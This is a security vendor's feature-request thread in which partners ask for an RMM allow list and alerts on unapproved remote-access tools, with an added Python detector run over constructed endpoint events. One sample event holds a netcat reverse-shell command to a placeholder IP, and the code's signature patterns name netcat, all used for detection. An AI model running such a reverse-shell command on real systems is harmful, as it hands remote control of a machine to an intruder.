Create Known Good RMM Profiles
Jonathan Belle
It’s a simple App Blocker feature or whitelist/blacklist option similar to what BlackPoint offers. Only allow the authorized RMMs and block all others. If this needs to be an additional tool, that’s fine—but the EDR should at least have an option that says “Block All Other RMMs.”
Another option would be to create an application baseline during initial onboarding that requires the customer to confirm the RMM tools detected on the endpoints. That way, the approved RMM is known from the start, and the detection process won't be delayed when something outside the baseline appears.
Tim Sword
Adding comments per partner correspondence:
"With any other RMM tool, it's like having another administrator onboard. They can do anything.
I'm concerned about the file transfer aspect of it. They had access for months. They could've been uglier and uninstalled our RMM and Huntress and we would've never known.
So I think a notification of another RMM would be a minimum."
Tim Sword
Adding comments per partner correspondence:
"I've been saying for a while we need a way to allow list one domain for ScreenConnect and preemptively ban all others. But there has never been a way to do that."
Ugnius Radzevicius
This feature is critically important for maintaining security visibility.
Currently, users can download and execute Remote Monitoring and Management (RMM) and Remote Desktop Protocol (RDP) applications from the public internet with zero visibility, regardless of whether they run with standard or administrative privileges.
As a Security Operations Center (SOC) monitoring tool, implementing detection for these unauthorized applications is crucial. This feature must:
Alert on designated channels when an untrusted RDP or RMM application is launched or attempts a connection.
Be configurable to allow specific, trusted RDP/RMM tools (similar to how trusted locations and VPN providers are handled).
Extend detection to include common reverse shell tools and frameworks, such as Netcat and the Metasploit Framework, when they initiate outbound connections or set up listeners.
Visibility into and control over the usage of remote access tools represents a vital monitoring aspect and is a fundamental requirement for effective security posture management.
Matthiew Morin (Huntress)
Merged in a post:
Provide functionality for customers to list expected RMMs in their environment.
Mark OHalloran
I believe a feature that could help an analyst quickly determine if an RMM is expected would be for customers to be able to provide an RMM whitelist. I was thinking that this functionality would be similar to the "expected VPNs/countries" in ITDR.
This would help the SOC scope potential compromises by rapidly identifying known good RMM usage, and it would provide a threat hunting opportunity by hunting for RMMs not on the allow list.
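The allow-list logic the posts above describe (Ugnius's "alert when an untrusted RMM launches or connects, with a configurable trusted list", the partner's "allow list one domain for ScreenConnect and ban all others" quoted by Tim Sword, and Mark's expected-RMM list), written out as an added example. This is not Huntress code or any poster's code: it runs over constructed JSON process-start and connection events; the image-name patterns, the event field names and the parsing of the ScreenConnect relay host from the client's `&h=` launch argument are all assumptions for illustration.

```python
"""Allow-list RMM detector (added example; not Huntress or any poster's code).

Reads constructed endpoint events (process starts and outbound connections),
matches them against a small, assumed table of remote-access tool signatures,
and raises an alert for any tool, or any ScreenConnect relay host, that is not
on the customer's allow list. Field names, patterns and events are assumptions.
"""
import json
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Pattern, Set

# Assumed image-name patterns; a real deployment would use a vetted catalogue.
RMM_SIGNATURES: Dict[str, Pattern[str]] = {
    "ScreenConnect": re.compile(r"screenconnect\.(clientservice|windowsclient)\.exe", re.I),
    "Atera": re.compile(r"ateraagent\.exe", re.I),
    "NinjaOne": re.compile(r"ninjarmmagent\.exe", re.I),
    "AnyDesk": re.compile(r"anydesk\.exe", re.I),
    "Netcat": re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b", re.I),
}
# Assumption: the ScreenConnect client carries its relay host as '&h=<host>' in its launch argument.
RELAY_RE = re.compile(r'[?&]h=([^&\s"]+)', re.I)

# Constructed sample events (JSON lines); hosts, paths and relays are invented.
SAMPLE_EVENTS = r'''
{"host": "WS01", "event": "process_start", "image": "C:\\Program Files (x86)\\ScreenConnect Client (a1b2c3)\\ScreenConnect.ClientService.exe", "cmdline": "\"C:\\Program Files (x86)\\ScreenConnect Client (a1b2c3)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=relay.msp-example.com&p=443&s=1\"", "dest_host": ""}
{"host": "WS01", "event": "network_connect", "image": "C:\\Program Files (x86)\\ScreenConnect Client (a1b2c3)\\ScreenConnect.ClientService.exe", "cmdline": "", "dest_host": "relay.msp-example.com"}
{"host": "WS02", "event": "process_start", "image": "C:\\Users\\Public\\ScreenConnect.ClientService.exe", "cmdline": "ScreenConnect.ClientService.exe \"?e=Access&h=sc.unknown-relay.example&p=8041\"", "dest_host": ""}
{"host": "WS03", "event": "process_start", "image": "C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe", "cmdline": "AteraAgent.exe", "dest_host": ""}
{"host": "WS04", "event": "process_start", "image": "C:\\Program Files\\NinjaRMMAgent\\NinjaRMMAgent.exe", "cmdline": "NinjaRMMAgent.exe", "dest_host": ""}
{"host": "WS05", "event": "network_connect", "image": "C:\\Windows\\Temp\\nc.exe", "cmdline": "nc.exe -e cmd.exe 203.0.113.7 4444", "dest_host": "203.0.113.7"}
{"host": "WS06", "event": "process_start", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe", "dest_host": ""}
'''


@dataclass(frozen=True)
class Alert:
    host: str
    tool: str
    reason: str
    detail: str


def parse_events(text: str) -> List[dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def identify_tool(image: str, cmdline: str) -> Optional[str]:
    """Return the signature name whose pattern hits the image path or command line, else None."""
    for name, pattern in RMM_SIGNATURES.items():
        if pattern.search(image) or pattern.search(cmdline):
            return name
    return None


def screenconnect_relay(ev: dict) -> str:
    """Relay host from the '&h=' launch argument, falling back to the connection destination."""
    m = RELAY_RE.search(ev.get("cmdline", ""))
    return m.group(1).lower() if m else ev.get("dest_host", "").lower()


def evaluate(events: List[dict], allowed_tools: Set[str], allowed_relays: Set[str]) -> List[Alert]:
    """Flag every remote-access tool not on the allow list, and every
    ScreenConnect instance whose relay host is not one the customer declared."""
    alerts: List[Alert] = []
    for ev in events:
        tool = identify_tool(ev.get("image", ""), ev.get("cmdline", ""))
        if tool is None:
            continue  # not a remote-access tool we know about
        if tool not in allowed_tools:
            alerts.append(Alert(ev["host"], tool, "tool not on allow list", ev.get("image", "")))
            continue
        if tool == "ScreenConnect":
            relay = screenconnect_relay(ev)
            if relay and relay not in allowed_relays:
                alerts.append(Alert(ev["host"], tool, "relay not on allow list", relay))
    return alerts


def run_demo() -> List[Alert]:
    allowed_tools = {"NinjaOne", "ScreenConnect"}  # the customer's expected RMMs (constructed)
    allowed_relays = {"relay.msp-example.com"}      # the customer's own ScreenConnect relay (constructed)
    return evaluate(parse_events(SAMPLE_EVENTS), allowed_tools, allowed_relays)


if __name__ == "__main__":
    for a in run_demo():
        print(f"[ALERT] {a.host}: {a.tool} ({a.reason}) {a.detail}")
```

On the constructed events this raises three alerts: the ScreenConnect client on WS02 pointed at a relay the customer never declared, the Atera agent on WS03, and the netcat reverse shell on WS05; the expected NinjaOne agent and the customer's own ScreenConnect relay are silent. The relay check is what gives the "one allowed domain, ban all others" behaviour the partner asked for: a legitimate product on the allow list is still alerted on when its instance belongs to someone else.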
Matt Wilson
+1 here. We use NinjaOne RMM + SentinelOne Complete & have ScreenConnect. Attacker used Atera Agent + outdated ScreenConnect calling home to a Netherlands IP. Went undetected for far too long, unfortunately, so no EDR nor WinEvent data to review leading up to and following the breach. :-/
Matthiew Morin (Huntress)
Merged in a post:
Known Good RMM Instances
Ryan Sipes
It would be helpful to be able to add known RMMs in an organization so that the Huntress team has more insight into anomalous RMM installs in co-managed environments. For example, we have a software team that installs CWC/SC across some of our client environments. Being able to add those instances to a whitelist would allow Huntress to know that those CWC/other RMM installs are allowed, but any other instances should potentially be investigated/looked at more closely.
Shawn Weisz
This is a great idea.
Joe Miller
FWIW, I have had Huntress catch known, rogue ScreenConnect instances.
Joel DeTeves
Yes please, RMMs are used by threat actors all the time. We also encounter scenarios where we have to weed through all the RMMs left behind by the old MSPs, who often don't remove them cleanly when handing over a client!